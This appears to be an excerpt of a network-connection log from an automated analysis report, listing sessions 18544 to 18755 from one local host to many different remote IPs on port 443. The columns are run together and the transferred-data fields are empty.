                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18544192.168.2.1449784158.13.212.181443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18545192.168.2.14533769.252.72.52443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18546192.168.2.143658097.70.207.84443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18547192.168.2.1437798173.224.119.147443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18548192.168.2.1453828203.255.175.236443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18549192.168.2.144431242.107.62.110443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18550192.168.2.145508466.151.80.18443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18551192.168.2.145892239.93.30.68443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18552192.168.2.1453220219.210.125.159443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18553192.168.2.144458060.27.195.72443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18554192.168.2.145844891.230.230.104443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18555192.168.2.146066214.148.73.173443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18556192.168.2.145541670.223.194.208443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18557192.168.2.1440116131.214.203.57443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18558192.168.2.1449536180.84.214.167443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18559192.168.2.143699020.156.16.128443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18560192.168.2.1438662172.249.90.45443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18561192.168.2.144443617.72.171.131443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18562192.168.2.146050042.122.104.105443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18563192.168.2.1447394140.253.4.118443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18564192.168.2.1453506156.76.118.163443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18565192.168.2.1446732196.178.77.65443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18566192.168.2.144033813.11.221.4443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18567192.168.2.1441552192.113.171.196443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18568192.168.2.1451600124.29.43.235443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18569192.168.2.143537037.230.226.38443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18570192.168.2.1440886107.21.74.234443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18571192.168.2.14384602.181.109.20443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18572192.168.2.145707450.191.235.22443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18573192.168.2.1441984117.92.58.163443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18574192.168.2.14448704.149.188.242443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18575192.168.2.144408835.130.73.17443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18576192.168.2.14398168.117.216.152443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18577192.168.2.1459204202.196.245.140443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18578192.168.2.1449420155.253.27.135443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18579192.168.2.1436440191.71.21.66443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18580192.168.2.145108841.199.144.73443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18581192.168.2.1451478159.65.3.1443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18582192.168.2.144916449.47.10.68443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18583192.168.2.1454700129.39.143.136443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18584192.168.2.145138878.70.233.224443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18585192.168.2.143973047.245.231.205443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18586192.168.2.144128691.86.197.0443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18587192.168.2.144287491.172.147.96443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18588192.168.2.144394249.190.36.67443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18589192.168.2.143922470.18.65.253443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18590192.168.2.1440650100.202.20.168443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18591192.168.2.1439998169.69.128.125443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18592192.168.2.144933285.20.57.17443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18593192.168.2.146001069.112.100.29443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18594192.168.2.1437194104.106.35.99443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18595192.168.2.1437004167.31.172.82443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18596192.168.2.1456920132.213.214.69443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18597192.168.2.1443302107.113.67.12443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18598192.168.2.1452424171.50.9.196443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18599192.168.2.1446870222.178.172.71443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18600192.168.2.1441734141.209.165.152443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18601192.168.2.1442028137.229.252.231443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18602192.168.2.14601301.149.83.196443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18603192.168.2.1454978158.158.67.205443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18604192.168.2.145617823.88.143.143443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18605192.168.2.14357864.117.147.88443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18606192.168.2.1450094130.208.174.122443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18607192.168.2.144433478.96.250.57443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18608192.168.2.1458270195.247.33.128443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18609192.168.2.1450100210.151.248.250443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18610192.168.2.143432490.116.168.57443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18611192.168.2.1435690104.146.138.89443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18612192.168.2.1445324119.102.249.222443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18613192.168.2.1433128196.189.50.197443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18614192.168.2.1441136213.158.242.89443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18615192.168.2.1441654175.35.172.2443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18616192.168.2.1460202155.192.97.146443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18617192.168.2.145467279.8.214.128443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18618192.168.2.1451610122.58.171.57443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18619192.168.2.1440410161.66.7.77443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18620192.168.2.1459050105.178.39.111443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18621192.168.2.1447046147.14.156.37443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18622192.168.2.1457670131.99.200.223443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18623192.168.2.14364964.120.165.95443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18624192.168.2.144842262.16.42.166443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18625192.168.2.145615832.237.168.243443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18626192.168.2.1447942104.145.228.109443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18627192.168.2.1438638197.242.76.122443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18628192.168.2.1456070217.173.108.10443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18629192.168.2.145358488.196.84.61443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18630192.168.2.1451816187.212.130.30443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18631192.168.2.14396428.180.16.202443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18632192.168.2.1447342101.177.192.0443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18633192.168.2.1451716146.158.255.216443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18634192.168.2.145873243.63.120.171443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18635192.168.2.144582227.44.94.219443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18636192.168.2.144916251.124.70.188443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18637192.168.2.143706827.194.181.51443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18638192.168.2.1447886123.176.106.202443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18639192.168.2.1456162117.199.33.40443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18640192.168.2.1449872161.33.83.20443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18641192.168.2.1433202162.30.102.178443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18642192.168.2.143411217.85.59.135443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18643192.168.2.143878412.251.172.205443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18644192.168.2.144844268.195.15.26443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18645192.168.2.144374263.67.200.12443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18646192.168.2.1445602166.60.166.193443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18647192.168.2.1445332150.13.150.130443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18648192.168.2.1457016200.45.173.22443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18649192.168.2.1436894202.36.140.199443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18650192.168.2.143903860.156.27.92443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18651192.168.2.1448152166.63.6.93443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18652192.168.2.144687092.128.235.102443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18653192.168.2.1446148188.112.125.124443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18654192.168.2.143598476.60.171.177443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18655192.168.2.145669483.186.240.54443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18656192.168.2.1447884123.143.16.98443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18657192.168.2.1442174211.182.150.142443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18658192.168.2.145771412.209.13.80443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18659192.168.2.1443970174.157.213.212443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18660192.168.2.144935419.43.116.210443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18661192.168.2.144896499.86.37.51443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18662192.168.2.1458340200.78.175.188443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18663192.168.2.143396284.231.95.170443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18664192.168.2.1441874202.110.149.179443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18665192.168.2.1452644190.227.15.212443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18666192.168.2.1454216221.58.30.139443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18667192.168.2.1438924133.112.110.250443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18668192.168.2.1442838129.227.12.95443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18669192.168.2.1452286221.185.251.60443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18670192.168.2.14545282.119.160.16443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18671192.168.2.143342070.178.166.62443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18672192.168.2.1459392185.138.64.103443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18673192.168.2.144970417.167.21.178443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18674192.168.2.1443522141.191.134.163443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18675192.168.2.1444790198.4.44.132443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18676192.168.2.144466625.40.215.80443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18677192.168.2.1436650207.14.134.145443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18678192.168.2.144580259.195.43.254443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18679192.168.2.1458618118.219.75.62443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18680192.168.2.1439276145.21.132.33443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18681192.168.2.1434032117.160.2.98443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18682192.168.2.1436392134.16.128.152443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18683192.168.2.144269435.15.83.60443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18684192.168.2.1452534133.187.19.114443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18685192.168.2.1443062184.143.144.31443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18686192.168.2.1449150166.61.140.45443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18687192.168.2.143370449.65.81.192443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18688192.168.2.1446976139.48.106.21443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18689192.168.2.1440606169.55.126.59443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18690192.168.2.144116267.140.122.194443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18691192.168.2.145607638.85.72.28443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18692192.168.2.14406324.53.175.210443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18693192.168.2.1438188140.189.207.85443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18694192.168.2.1443502223.142.115.72443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18695192.168.2.1457092176.46.213.19443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18696192.168.2.1438122177.23.238.85443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18697192.168.2.1448770192.7.26.168443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18698192.168.2.1457798210.50.184.149443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18699192.168.2.145620496.247.199.162443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18700192.168.2.145143476.42.242.168443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18701192.168.2.1458684220.42.243.49443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18702192.168.2.145029027.219.14.40443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18703192.168.2.143665427.99.23.185443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18704192.168.2.1441932117.74.33.122443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18705192.168.2.1451292129.239.130.148443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18706192.168.2.1437152182.95.158.140443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18707192.168.2.145410064.46.176.28443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18708192.168.2.144976692.251.61.169443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18709192.168.2.1451712211.161.250.144443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18710192.168.2.143826888.151.150.66443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18711192.168.2.143811267.159.197.32443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18712192.168.2.1435664208.18.250.11443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18713192.168.2.1442160218.113.232.192443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18714192.168.2.145803091.22.127.247443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18715192.168.2.1440660168.99.73.189443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18716192.168.2.1456138117.22.178.199443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18717192.168.2.1434422193.39.98.31443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18718192.168.2.1451416103.155.181.189443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18719192.168.2.1448146107.209.27.45443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18720192.168.2.1454476182.104.72.219443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18721192.168.2.1434652172.158.9.94443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18722192.168.2.1454392221.175.131.194443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18723192.168.2.144036245.22.152.9443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18724192.168.2.1455984118.147.202.80443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18725192.168.2.144979476.83.77.160443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18726192.168.2.1434740164.193.183.150443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18727192.168.2.144244869.249.41.151443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18728192.168.2.1446698174.163.173.224443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18729192.168.2.143821669.86.235.134443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18730192.168.2.1453402157.18.16.112443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18731192.168.2.1449696216.164.13.1443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18732192.168.2.144013083.94.46.2443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18733192.168.2.1460122168.165.111.179443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18734192.168.2.1438470101.113.166.60443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18735192.168.2.1446478170.190.45.248443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18736192.168.2.1457802145.198.55.251443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18737192.168.2.1458962156.76.240.7443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18738192.168.2.1446840170.63.40.235443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18739192.168.2.1446852218.154.92.60443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18740192.168.2.1453626201.91.200.71443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18741192.168.2.1440128108.126.56.91443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18742192.168.2.1439082121.189.238.48443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18743192.168.2.144107840.17.248.24443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18744192.168.2.1438256121.130.3.133443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18745192.168.2.1447894211.192.208.18443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18746192.168.2.1446664136.232.118.26443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18747192.168.2.1435834121.160.239.201443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18748192.168.2.1433390134.250.86.114443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18749192.168.2.1455910113.104.61.235443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18750192.168.2.1441338196.212.150.98443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18751192.168.2.143519014.212.203.92443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18752192.168.2.1440022113.162.253.186443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18753192.168.2.145430460.234.100.168443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18754192.168.2.143373269.41.146.90443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      18755192.168.2.143617823.47.25.184443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
